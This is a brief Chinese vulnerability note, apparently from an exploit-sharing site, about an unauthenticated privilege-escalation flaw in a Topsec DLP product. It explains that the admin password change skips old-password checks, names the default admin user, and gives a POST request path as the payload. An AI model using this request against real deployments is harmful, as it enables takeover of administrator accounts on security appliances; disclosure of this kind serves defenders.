天融信DLP_未授權&越權漏洞

# 天融信DLP 未授權&越權漏洞
==漏洞原理==

管理員登錄系統系統之後修改密碼,未採用原密碼校驗,且存在未授權訪問導致存在越權修改管理員密碼。

==默認用戶==

superman --- uid=1

==Payload==

POST  /?module-auth_user&action=mod_edit.pwd HTTP/1.1
© 版权声明
THE END
喜欢就支持一下吧
点赞0赞赏 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容